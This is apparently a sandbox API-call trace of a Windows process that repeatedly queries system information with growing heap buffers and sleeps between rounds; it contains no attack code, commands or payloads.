0x295d520 [0282.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0282.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0282.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0282.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0282.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0282.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0282.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0282.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.630] Sleep (dwMilliseconds=0x110) [0282.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0282.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0282.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0282.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0282.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0282.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0282.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0282.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0282.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.642] Sleep (dwMilliseconds=0x110) [0282.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0282.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0282.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0282.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0282.655] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0282.655] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0282.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0282.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0282.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.657] Sleep (dwMilliseconds=0x110) [0282.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0282.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0282.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0282.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0282.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0282.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0282.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0282.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0282.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.675] Sleep (dwMilliseconds=0x110) [0282.684] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0282.684] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.685] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0282.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0282.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0282.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0282.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0282.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0282.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0282.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.693] Sleep (dwMilliseconds=0x110) [0282.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0282.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0282.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0282.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0282.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0282.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0282.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0282.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0282.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.707] Sleep (dwMilliseconds=0x110) [0282.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0282.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0282.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0282.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0282.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0282.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0282.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0282.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0282.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.721] Sleep (dwMilliseconds=0x110) [0282.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0282.731] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0282.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0282.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0282.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0282.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0282.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0282.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0282.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.738] Sleep (dwMilliseconds=0x110) [0282.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0282.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0282.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0282.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0282.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0282.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0282.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0282.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0282.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.753] Sleep (dwMilliseconds=0x110) [0282.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0282.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0282.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0282.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0282.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0282.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0282.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0282.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0282.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.767] Sleep (dwMilliseconds=0x110) [0282.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0282.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0282.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0282.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0282.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0282.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0282.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0282.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0282.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.784] Sleep (dwMilliseconds=0x110) [0282.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0282.802] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0282.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0282.802] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.803] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0282.803] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0282.803] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.804] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0282.804] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0282.804] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.805] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0282.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.810] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.810] Sleep (dwMilliseconds=0x110) [0282.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0282.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0282.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0282.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0282.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0282.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0282.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0282.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0282.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.831] Sleep (dwMilliseconds=0x110) [0282.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0282.841] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0282.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0282.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0282.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0282.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0282.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0282.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0282.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0282.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0282.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0282.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0282.845] Sleep 